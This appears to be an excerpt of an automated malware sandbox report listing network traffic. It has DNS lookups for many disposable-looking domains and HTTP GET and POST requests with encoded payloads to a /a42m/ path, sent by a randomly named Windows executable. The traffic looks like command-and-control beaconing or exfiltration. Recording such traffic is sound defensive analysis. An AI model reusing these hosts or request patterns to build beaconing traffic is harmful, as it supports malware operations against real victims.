                          May 23, 2024 15:19:39.009840012 CEST805368866.29.137.43192.168.2.5
                          May 23, 2024 15:19:39.009849072 CEST805368866.29.137.43192.168.2.5
                          May 23, 2024 15:19:39.009933949 CEST5368880192.168.2.566.29.137.43
                          May 23, 2024 15:19:39.905976057 CEST5368880192.168.2.566.29.137.43
                          May 23, 2024 15:19:40.925594091 CEST5368980192.168.2.566.29.137.43
                          May 23, 2024 15:19:41.193614006 CEST805368966.29.137.43192.168.2.5
                          May 23, 2024 15:19:41.197273970 CEST5368980192.168.2.566.29.137.43
                          May 23, 2024 15:19:41.197451115 CEST5368980192.168.2.566.29.137.43
                          May 23, 2024 15:19:41.203496933 CEST805368966.29.137.43192.168.2.5
                          May 23, 2024 15:19:41.800538063 CEST805368966.29.137.43192.168.2.5
                          May 23, 2024 15:19:41.805368900 CEST805368966.29.137.43192.168.2.5
                          May 23, 2024 15:19:41.805377007 CEST805368966.29.137.43192.168.2.5
                          May 23, 2024 15:19:41.806509018 CEST5368980192.168.2.566.29.137.43
                          May 23, 2024 15:19:41.808101892 CEST5368980192.168.2.566.29.137.43
                          May 23, 2024 15:19:41.857327938 CEST805368966.29.137.43192.168.2.5

                          UDP Packets

                          TimestampSource PortDest PortSource IPDest IP
                          May 23, 2024 15:16:15.244690895 CEST53575581.1.1.1192.168.2.5
                          May 23, 2024 15:16:25.972785950 CEST5024953192.168.2.51.1.1.1
                          May 23, 2024 15:16:26.258702040 CEST53502491.1.1.1192.168.2.5
                          May 23, 2024 15:16:31.268405914 CEST5190253192.168.2.51.1.1.1
                          May 23, 2024 15:16:31.294567108 CEST53519021.1.1.1192.168.2.5
                          May 23, 2024 15:16:36.299529076 CEST5419353192.168.2.51.1.1.1
                          May 23, 2024 15:16:36.319835901 CEST53541931.1.1.1192.168.2.5
                          May 23, 2024 15:16:41.330713034 CEST6273253192.168.2.51.1.1.1
                          May 23, 2024 15:16:41.342009068 CEST53627321.1.1.1192.168.2.5
                          May 23, 2024 15:16:46.361840963 CEST5218453192.168.2.51.1.1.1
                          May 23, 2024 15:16:47.359380960 CEST5218453192.168.2.51.1.1.1
                          May 23, 2024 15:16:47.370224953 CEST53521841.1.1.1192.168.2.5
                          May 23, 2024 15:16:48.574379921 CEST53521841.1.1.1192.168.2.5
                          May 23, 2024 15:17:01.299685001 CEST6012853192.168.2.51.1.1.1
                          May 23, 2024 15:17:01.311027050 CEST53601281.1.1.1192.168.2.5
                          May 23, 2024 15:17:09.377969980 CEST6218153192.168.2.51.1.1.1
                          May 23, 2024 15:17:10.397950888 CEST53621811.1.1.1192.168.2.5
                          May 23, 2024 15:17:10.404933929 CEST6218153192.168.2.51.1.1.1
                          May 23, 2024 15:17:10.413115025 CEST53621811.1.1.1192.168.2.5
                          May 23, 2024 15:17:24.367063046 CEST5270153192.168.2.51.1.1.1
                          May 23, 2024 15:17:24.391853094 CEST53527011.1.1.1192.168.2.5
                          May 23, 2024 15:17:38.786361933 CEST5892053192.168.2.51.1.1.1
                          May 23, 2024 15:17:38.836503983 CEST53589201.1.1.1192.168.2.5
                          May 23, 2024 15:17:51.940403938 CEST5294853192.168.2.51.1.1.1
                          May 23, 2024 15:17:51.996388912 CEST53529481.1.1.1192.168.2.5
                          May 23, 2024 15:18:06.154161930 CEST5997753192.168.2.51.1.1.1
                          May 23, 2024 15:18:06.181655884 CEST53599771.1.1.1192.168.2.5
                          May 23, 2024 15:18:19.456003904 CEST5950753192.168.2.51.1.1.1
                          May 23, 2024 15:18:20.452727079 CEST5950753192.168.2.51.1.1.1
                          May 23, 2024 15:18:21.103365898 CEST53595071.1.1.1192.168.2.5
                          May 23, 2024 15:18:21.103375912 CEST53595071.1.1.1192.168.2.5
                          May 23, 2024 15:18:56.550563097 CEST6371353192.168.2.51.1.1.1
                          May 23, 2024 15:18:56.840864897 CEST53637131.1.1.1192.168.2.5
                          May 23, 2024 15:19:10.418337107 CEST4982753192.168.2.51.1.1.1
                          May 23, 2024 15:19:10.449769974 CEST53498271.1.1.1192.168.2.5
                          May 23, 2024 15:19:19.269819975 CEST6484153192.168.2.51.1.1.1
                          May 23, 2024 15:19:20.049076080 CEST53648411.1.1.1192.168.2.5
                          May 23, 2024 15:19:33.285515070 CEST6480753192.168.2.51.1.1.1
                          May 23, 2024 15:19:33.320512056 CEST53648071.1.1.1192.168.2.5
                          May 23, 2024 15:19:51.408020973 CEST5863653192.168.2.51.1.1.1
                          May 23, 2024 15:19:51.687715054 CEST53586361.1.1.1192.168.2.5
                          May 23, 2024 15:19:56.704643011 CEST6416253192.168.2.51.1.1.1
                          May 23, 2024 15:19:56.721750975 CEST53641621.1.1.1192.168.2.5
                          May 23, 2024 15:20:05.284225941 CEST5827553192.168.2.51.1.1.1
                          May 23, 2024 15:20:05.294856071 CEST53582751.1.1.1192.168.2.5
                          May 23, 2024 15:20:13.798201084 CEST6052153192.168.2.51.1.1.1
                          May 23, 2024 15:20:13.883647919 CEST53605211.1.1.1192.168.2.5

                          DNS Queries

                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                          May 23, 2024 15:16:25.972785950 CEST192.168.2.51.1.1.10x721Standard query (0)www.designsbysruly.comA (IP address)IN (0x0001)false
                          May 23, 2024 15:16:31.268405914 CEST192.168.2.51.1.1.10x50f9Standard query (0)www.weeveno.comA (IP address)IN (0x0001)false
                          May 23, 2024 15:16:36.299529076 CEST192.168.2.51.1.1.10x883Standard query (0)www.gcashservice247.comA (IP address)IN (0x0001)false
                          May 23, 2024 15:16:41.330713034 CEST192.168.2.51.1.1.10x327Standard query (0)www.infomail.websiteA (IP address)IN (0x0001)false
                          May 23, 2024 15:16:46.361840963 CEST192.168.2.51.1.1.10xc362Standard query (0)www.gregoriusalvin.comA (IP address)IN (0x0001)false
                          May 23, 2024 15:16:47.359380960 CEST192.168.2.51.1.1.10xc362Standard query (0)www.gregoriusalvin.comA (IP address)IN (0x0001)false
                          May 23, 2024 15:17:01.299685001 CEST192.168.2.51.1.1.10xfb54Standard query (0)www.italiangreyhounds.onlineA (IP address)IN (0x0001)false
                          May 23, 2024 15:17:09.377969980 CEST192.168.2.51.1.1.10x2390Standard query (0)www.tintasmaiscor.comA (IP address)IN (0x0001)false
                          May 23, 2024 15:17:10.404933929 CEST192.168.2.51.1.1.10x2390Standard query (0)www.tintasmaiscor.comA (IP address)IN (0x0001)false
                          May 23, 2024 15:17:24.367063046 CEST192.168.2.51.1.1.10xa4d5Standard query (0)www.crimsoncascade.xyzA (IP address)IN (0x0001)false
                          May 23, 2024 15:17:38.786361933 CEST192.168.2.51.1.1.10xb0c0Standard query (0)www.xn--bb55rtp-9va2p.storeA (IP address)IN (0x0001)false
                          May 23, 2024 15:17:51.940403938 CEST192.168.2.51.1.1.10xccbStandard query (0)www.fidyart.comA (IP address)IN (0x0001)false
                          May 23, 2024 15:18:06.154161930 CEST192.168.2.51.1.1.10xe7f6Standard query (0)www.leaflearn.storeA (IP address)IN (0x0001)false
                          May 23, 2024 15:18:19.456003904 CEST192.168.2.51.1.1.10x3196Standard query (0)www.p65cq675did.shopA (IP address)IN (0x0001)false
                          May 23, 2024 15:18:20.452727079 CEST192.168.2.51.1.1.10x3196Standard query (0)www.p65cq675did.shopA (IP address)IN (0x0001)false
                          May 23, 2024 15:18:56.550563097 CEST192.168.2.51.1.1.10xdceaStandard query (0)www.digitoxmarketing.comA (IP address)IN (0x0001)false
                          May 23, 2024 15:19:10.418337107 CEST192.168.2.51.1.1.10xa760Standard query (0)www.transformthedorm.comA (IP address)IN (0x0001)false
                          May 23, 2024 15:19:19.269819975 CEST192.168.2.51.1.1.10x9836Standard query (0)www.6whebx.cyouA (IP address)IN (0x0001)false
                          May 23, 2024 15:19:33.285515070 CEST192.168.2.51.1.1.10x75aStandard query (0)www.ratulunabet78.xyzA (IP address)IN (0x0001)false
                          May 23, 2024 15:19:51.408020973 CEST192.168.2.51.1.1.10xe844Standard query (0)www.designsbysruly.comA (IP address)IN (0x0001)false
                          May 23, 2024 15:19:56.704643011 CEST192.168.2.51.1.1.10x9a2eStandard query (0)www.weeveno.comA (IP address)IN (0x0001)false
                          May 23, 2024 15:20:05.284225941 CEST192.168.2.51.1.1.10xce9bStandard query (0)www.gcashservice247.comA (IP address)IN (0x0001)false
                          May 23, 2024 15:20:13.798201084 CEST192.168.2.51.1.1.10x8c6cStandard query (0)www.infomail.websiteA (IP address)IN (0x0001)false

                          DNS Answers

                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                          May 23, 2024 15:16:26.258702040 CEST1.1.1.1192.168.2.50x721Server failure (2)www.designsbysruly.comnonenoneA (IP address)IN (0x0001)false
                          May 23, 2024 15:16:31.294567108 CEST1.1.1.1192.168.2.50x50f9Name error (3)www.weeveno.comnonenoneA (IP address)IN (0x0001)false
                          May 23, 2024 15:16:36.319835901 CEST1.1.1.1192.168.2.50x883Name error (3)www.gcashservice247.comnonenoneA (IP address)IN (0x0001)false
                          May 23, 2024 15:16:41.342009068 CEST1.1.1.1192.168.2.50x327Name error (3)www.infomail.websitenonenoneA (IP address)IN (0x0001)false
                          May 23, 2024 15:16:48.574379921 CEST1.1.1.1192.168.2.50xc362No error (0)www.gregoriusalvin.comgregoriusalvin.comCNAME (Canonical name)IN (0x0001)false
                          May 23, 2024 15:16:48.574379921 CEST1.1.1.1192.168.2.50xc362No error (0)gregoriusalvin.com103.247.10.164A (IP address)IN (0x0001)false
                          May 23, 2024 15:17:01.311027050 CEST1.1.1.1192.168.2.50xfb54Name error (3)www.italiangreyhounds.onlinenonenoneA (IP address)IN (0x0001)false
                          May 23, 2024 15:17:10.397950888 CEST1.1.1.1192.168.2.50x2390No error (0)www.tintasmaiscor.comtintasmaiscor.comCNAME (Canonical name)IN (0x0001)false
                          May 23, 2024 15:17:10.397950888 CEST1.1.1.1192.168.2.50x2390No error (0)tintasmaiscor.com162.240.81.18A (IP address)IN (0x0001)false
                          May 23, 2024 15:17:10.413115025 CEST1.1.1.1192.168.2.50x2390No error (0)www.tintasmaiscor.comtintasmaiscor.comCNAME (Canonical name)IN (0x0001)false
                          May 23, 2024 15:17:10.413115025 CEST1.1.1.1192.168.2.50x2390No error (0)tintasmaiscor.com162.240.81.18A (IP address)IN (0x0001)false
                          May 23, 2024 15:17:24.391853094 CEST1.1.1.1192.168.2.50xa4d5No error (0)www.crimsoncascade.xyz162.0.237.22A (IP address)IN (0x0001)false
                          May 23, 2024 15:17:38.836503983 CEST1.1.1.1192.168.2.50xb0c0No error (0)www.xn--bb55rtp-9va2p.storexn--bb55rtp-9va2p.storeCNAME (Canonical name)IN (0x0001)false
                          May 23, 2024 15:17:38.836503983 CEST1.1.1.1192.168.2.50xb0c0No error (0)xn--bb55rtp-9va2p.store84.32.84.32A (IP address)IN (0x0001)false
                          May 23, 2024 15:17:51.996388912 CEST1.1.1.1192.168.2.50xccbNo error (0)www.fidyart.comfidyart.comCNAME (Canonical name)IN (0x0001)false
                          May 23, 2024 15:17:51.996388912 CEST1.1.1.1192.168.2.50xccbNo error (0)fidyart.com63.250.43.147A (IP address)IN (0x0001)false
                          May 23, 2024 15:17:51.996388912 CEST1.1.1.1192.168.2.50xccbNo error (0)fidyart.com63.250.43.146A (IP address)IN (0x0001)false
                          May 23, 2024 15:18:06.181655884 CEST1.1.1.1192.168.2.50xe7f6No error (0)www.leaflearn.store89.31.143.90A (IP address)IN (0x0001)false
                          May 23, 2024 15:18:21.103365898 CEST1.1.1.1192.168.2.50x3196No error (0)www.p65cq675did.shopk2-ld.wakak1.shopCNAME (Canonical name)IN (0x0001)false
                          May 23, 2024 15:18:21.103365898 CEST1.1.1.1192.168.2.50x3196No error (0)k2-ld.wakak1.shop154.55.135.138A (IP address)IN (0x0001)false
                          May 23, 2024 15:18:21.103365898 CEST1.1.1.1192.168.2.50x3196No error (0)k2-ld.wakak1.shop154.39.248.133A (IP address)IN (0x0001)false
                          May 23, 2024 15:18:21.103375912 CEST1.1.1.1192.168.2.50x3196No error (0)www.p65cq675did.shopk2-ld.wakak1.shopCNAME (Canonical name)IN (0x0001)false
                          May 23, 2024 15:18:21.103375912 CEST1.1.1.1192.168.2.50x3196No error (0)k2-ld.wakak1.shop154.55.135.138A (IP address)IN (0x0001)false
                          May 23, 2024 15:18:21.103375912 CEST1.1.1.1192.168.2.50x3196No error (0)k2-ld.wakak1.shop154.39.248.133A (IP address)IN (0x0001)false
                          May 23, 2024 15:18:56.840864897 CEST1.1.1.1192.168.2.50xdceaNo error (0)www.digitoxmarketing.comdigitoxmarketing.comCNAME (Canonical name)IN (0x0001)false
                          May 23, 2024 15:18:56.840864897 CEST1.1.1.1192.168.2.50xdceaNo error (0)digitoxmarketing.com104.194.9.31A (IP address)IN (0x0001)false
                          May 23, 2024 15:19:10.449769974 CEST1.1.1.1192.168.2.50xa760Name error (3)www.transformthedorm.comnonenoneA (IP address)IN (0x0001)false
                          May 23, 2024 15:19:20.049076080 CEST1.1.1.1192.168.2.50x9836No error (0)www.6whebx.cyou192.74.233.3A (IP address)IN (0x0001)false
                          May 23, 2024 15:19:33.320512056 CEST1.1.1.1192.168.2.50x75aNo error (0)www.ratulunabet78.xyzratulunabet78.xyzCNAME (Canonical name)IN (0x0001)false
                          May 23, 2024 15:19:33.320512056 CEST1.1.1.1192.168.2.50x75aNo error (0)ratulunabet78.xyz66.29.137.43A (IP address)IN (0x0001)false
                          May 23, 2024 15:19:51.687715054 CEST1.1.1.1192.168.2.50xe844Server failure (2)www.designsbysruly.comnonenoneA (IP address)IN (0x0001)false
                          May 23, 2024 15:19:56.721750975 CEST1.1.1.1192.168.2.50x9a2eName error (3)www.weeveno.comnonenoneA (IP address)IN (0x0001)false
                          May 23, 2024 15:20:05.294856071 CEST1.1.1.1192.168.2.50xce9bName error (3)www.gcashservice247.comnonenoneA (IP address)IN (0x0001)false
                          May 23, 2024 15:20:13.883647919 CEST1.1.1.1192.168.2.50x8c6cName error (3)www.infomail.websitenonenoneA (IP address)IN (0x0001)false

                          HTTP Request Dependency Graph

                          • www.gregoriusalvin.com
                          • www.tintasmaiscor.com
                          • www.crimsoncascade.xyz
                          • www.xn--bb55rtp-9va2p.store
                          • www.fidyart.com
                          • www.leaflearn.store
                          • www.p65cq675did.shop
                          • www.digitoxmarketing.com
                          • www.6whebx.cyou
                          • www.ratulunabet78.xyz

                          HTTP Packets

                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          0192.168.2.553652103.247.10.164807116C:\Program Files (x86)\WYnqDTcohWTLuYGfHVXqPgPPjvyizBZlKphwPdgHrUSvPXmyFbVimH\sXAKgqpSAiGEzhyDsUSKBxPWz.exe
                          TimestampBytes transferredDirectionData
                          May 23, 2024 15:16:50.015697002 CEST488OUTGET /a42m/?R0nl4=f64p&vH5=6CH/YRMAK7aydmoZX4rE3aHTO96gtIC3593I/qH1Euv5gdtO1aVIaIsEnNz/XwGPewRjk6ONG4Ys+seqd2cELhY1N+SfeluTEbHos+Hkwv+a06EBMG8yJcZA+l8yWcOKFg== HTTP/1.1
                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                          Accept-Language: en-US,en
                          Host: www.gregoriusalvin.com
                          Connection: close
                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                          May 23, 2024 15:16:51.268683910 CEST1236INHTTP/1.1 404 Not Found
                          Connection: close
                          cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                          pragma: no-cache
                          content-type: text/html
                          content-length: 1238
                          date: Thu, 23 May 2024 13:16:51 GMT
                          server: LiteSpeed
                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 [TRUNCATED]
                          Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by <a style="color:#fff;"
                          May 23, 2024 15:16:51.274008036 CEST240INData Raw: 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 6c 69 74 65 73 70 65 65 64 74 65 63 68 2e 63 6f 6d 2f 65 72 72 6f 72 2d 70 61 67 65 22 3e 4c 69 74 65 53 70 65 65 64 20 57 65 62 20 53 65 72 76 65 72 3c 2f 61 3e 3c 70 3e 50 6c 65 61 73 65 20 62
                          Data Ascii: href="http://www.litespeedtech.com/error-page">LiteSpeed Web Server</a><p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></body></html>


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          1192.168.2.553654162.240.81.18807116C:\Program Files (x86)\WYnqDTcohWTLuYGfHVXqPgPPjvyizBZlKphwPdgHrUSvPXmyFbVimH\sXAKgqpSAiGEzhyDsUSKBxPWz.exe
                          TimestampBytes transferredDirectionData
                          May 23, 2024 15:17:10.469532967 CEST759OUTPOST /a42m/ HTTP/1.1
                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                          Accept-Language: en-US,en
                          Accept-Encoding: gzip, deflate, br
                          Host: www.tintasmaiscor.com
                          Origin: http://www.tintasmaiscor.com
                          Content-Type: application/x-www-form-urlencoded
                          Cache-Control: max-age=0
                          Content-Length: 204
                          Connection: close
                          Referer: http://www.tintasmaiscor.com/a42m/
                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                          Data Raw: 76 48 35 3d 4d 59 70 37 78 52 45 6f 32 6c 57 6d 71 78 79 72 78 75 79 2f 74 7a 38 76 6e 66 36 74 59 66 78 71 4b 66 65 54 43 2f 42 50 6a 34 76 74 41 36 2f 70 68 76 4d 4a 6f 53 31 44 33 38 56 2f 4d 68 31 58 62 49 63 6f 55 75 32 45 6e 51 62 32 6e 4f 39 65 49 66 4b 49 55 49 2f 36 42 74 55 34 39 6c 62 78 68 64 36 69 5a 6b 76 4b 72 4f 7a 71 56 65 69 4c 2f 33 34 41 55 2f 49 64 33 6b 67 77 73 77 72 77 64 64 31 37 59 38 4e 73 53 56 2b 4d 45 6f 76 65 4c 45 5a 39 5a 62 36 50 55 33 6d 32 70 50 33 54 55 6e 6d 61 7a 32 74 49 74 76 65 2f 2b 72 73 45 67 77 47 38 41 55 4c 59 65 62 61 66 44 6e 2f 36 36 5a 57 52 73 31 38 3d
                          Data Ascii: vH5=MYp7xREo2lWmqxyrxuy/tz8vnf6tYfxqKfeTC/BPj4vtA6/phvMJoS1D38V/Mh1XbIcoUu2EnQb2nO9eIfKIUI/6BtU49lbxhd6iZkvKrOzqVeiL/34AU/Id3kgwswrwdd17Y8NsSV+MEoveLEZ9Zb6PU3m2pP3TUnmaz2tItve/+rsEgwG8AULYebafDn/66ZWRs18=
                          May 23, 2024 15:17:11.082813025 CEST1236INHTTP/1.1 404 Not Found
                          Server: nginx/1.20.1
                          Date: Thu, 23 May 2024 13:17:11 GMT
                          Content-Type: text/html
                          Content-Length: 3650
                          Connection: close
                          ETag: "636d2d22-e42"
                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 54 68 65 20 70 61 67 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 2f 2a 3c [TRUNCATED]
                          Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <title>The page is not found</title> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <style type="text/css"> /*<![CDATA[*/ body { background-color: #fff; color: #000; font-size: 0.9em; font-family: sans-serif,helvetica; margin: 0; padding: 0; } :link { color: #c00; } :visited { color: #c00; } a:hover { color: #f50; } h1 { text-align: center; margin: 0; padding: 0.6em 2em 0.4em; background-color: #294172; color: #fff; font-weight: norm [TRUNCATED]
                          May 23, 2024 15:17:11.086544991 CEST1236INData Raw: 20 20 20 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 32 70 78 20 73 6f 6c 69 64 20 23 30 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 31 20 73 74 72 6f 6e 67 20 7b 0a 20 20 20 20 20 20 20 20 20
                          Data Ascii: border-bottom: 2px solid #000; } h1 strong { font-weight: bold; font-size: 1.5em; } h2 { text-align: center; background-color:
                          May 23, 2024 15:17:11.090539932 CEST1236INData Raw: 3c 68 31 3e 3c 73 74 72 6f 6e 67 3e 6e 67 69 6e 78 20 65 72 72 6f 72 21 3c 2f 73 74 72 6f 6e 67 3e 3c 2f 68 31 3e 0a 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 22 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20
                          Data Ascii: <h1><strong>nginx error!</strong></h1> <div class="content"> <h3>The page you are looking for is not found.</h3> <div class="alert"> <h2>Website Administrator</h2> <div class="
                          May 23, 2024 15:17:11.090557098 CEST115INData Raw: 46 65 64 6f 72 61 20 5d 22 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 38 38 22 20 68 65 69 67 68 74 3d 22 33 31 22 20 2f 3e 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20
                          Data Ascii: Fedora ]" width="88" height="31" /></a> </div> </div> </body></html>


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          2192.168.2.553655162.240.81.18807116C:\Program Files (x86)\WYnqDTcohWTLuYGfHVXqPgPPjvyizBZlKphwPdgHrUSvPXmyFbVimH\sXAKgqpSAiGEzhyDsUSKBxPWz.exe
                          TimestampBytes transferredDirectionData
                          May 23, 2024 15:17:13.037537098 CEST779OUTPOST /a42m/ HTTP/1.1
                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                          Accept-Language: en-US,en
                          Accept-Encoding: gzip, deflate, br
                          Host: www.tintasmaiscor.com
                          Origin: http://www.tintasmaiscor.com
                          Content-Type: application/x-www-form-urlencoded
                          Cache-Control: max-age=0
                          Content-Length: 224
                          Connection: close
                          Referer: http://www.tintasmaiscor.com/a42m/
                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                          Data Raw: 76 48 35 3d 4d 59 70 37 78 52 45 6f 32 6c 57 6d 72 52 43 72 68 39 61 2f 73 54 38 73 72 2f 36 74 58 2f 78 55 4b 66 53 54 43 37 52 68 6a 4d 44 74 4f 2f 44 70 67 75 4d 4a 72 53 31 44 69 4d 56 2b 54 78 31 63 62 49 51 4b 55 75 61 45 6e 51 50 32 6e 50 4e 65 49 4d 53 4c 62 34 2f 38 4b 4e 55 36 6c 46 62 78 68 64 36 69 5a 6b 4c 73 72 4f 72 71 56 74 71 4c 77 32 34 42 64 66 49 65 79 55 67 77 6f 77 72 30 64 64 31 6a 59 34 4d 42 53 58 32 4d 45 71 33 65 4c 56 5a 2b 41 72 36 57 4b 48 6d 6f 71 4d 47 49 53 52 57 67 31 30 6f 53 73 70 75 4e 79 39 42 75 36 53 4f 55 54 30 6e 67 4f 49 53 6f 53 58 65 54 67 36 47 68 79 69 6f 41 33 62 42 64 48 30 79 53 48 62 6d 4e 2f 46 4a 4f 69 31 63 6b
                          Data Ascii: vH5=MYp7xREo2lWmrRCrh9a/sT8sr/6tX/xUKfSTC7RhjMDtO/DpguMJrS1DiMV+Tx1cbIQKUuaEnQP2nPNeIMSLb4/8KNU6lFbxhd6iZkLsrOrqVtqLw24BdfIeyUgwowr0dd1jY4MBSX2MEq3eLVZ+Ar6WKHmoqMGISRWg10oSspuNy9Bu6SOUT0ngOISoSXeTg6GhyioA3bBdH0ySHbmN/FJOi1ck
                          May 23, 2024 15:17:13.611696959 CEST1236INHTTP/1.1 404 Not Found
                          Server: nginx/1.20.1
                          Date: Thu, 23 May 2024 13:17:13 GMT
                          Content-Type: text/html
                          Content-Length: 3650
                          Connection: close
                          ETag: "636d2d22-e42"
                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 54 68 65 20 70 61 67 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 2f 2a 3c [TRUNCATED]
